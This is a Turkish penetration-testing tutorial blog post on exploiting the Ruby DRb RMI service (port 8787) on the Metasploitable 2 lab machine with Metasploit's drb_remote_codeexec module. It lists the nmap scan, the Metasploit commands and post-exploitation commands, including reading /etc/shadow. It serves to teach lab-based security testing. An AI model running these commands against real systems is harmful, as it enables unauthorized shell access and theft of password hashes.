MSF drb_remote_codeexec İstismar Modülü ile Ruby DRb RMI Zafiyetinin İstismar Edilerek Komut Satırı Bağlantısının Elde Edilmesi

Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda, Metasploitable 2 üzerindeki Ruby DRb RMI servisine ait zafiyet tespit edildikten sonra istismar edilecek ve bu servisi çalıştıran kullanıcı hakları ile komut satırı bağlantısı elde edilecektir.

DRb (Distributed Ruby) ağ üzerinden veya aynı sistemdeki ruby uygulamalarının birbiri ile iletişim kurmasına yarayan bir kütüphanedir. Böylece farklı bir Ruby prosesindeki bir nesne RMI / RPC (Remote Method Invocation / Remote Procedure Call) ile çağırılabilir.

IP adresi 192.168.162.131 olan Metasploitable 2, Nmap ile taratıldığında TCP 8787. portta Ruby DRb RMI servisinin çalıştığı ve bu servisin 1.8 sürümünün kullanıldığı görülmektedir.

nmap 192.168.162.131 -p 8787 -sV

acquiring-command-line-on-linux-by-using-msf-drb-remote-codeexec-exploit-module-01

 

Bu servise ait istismar kodu bulunur.

search druby
use exploit/linux/misc/drb_remote_codeexec
show options

acquiring-command-line-on-linux-by-using-msf-drb-remote-codeexec-exploit-module-02

 

Modül çalıştırılır.

set URI druby://192.168.162.131:8787
run
hostname
id
head -5 /etc/shadow

acquiring-command-line-on-linux-by-using-msf-drb-remote-codeexec-exploit-module-03

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.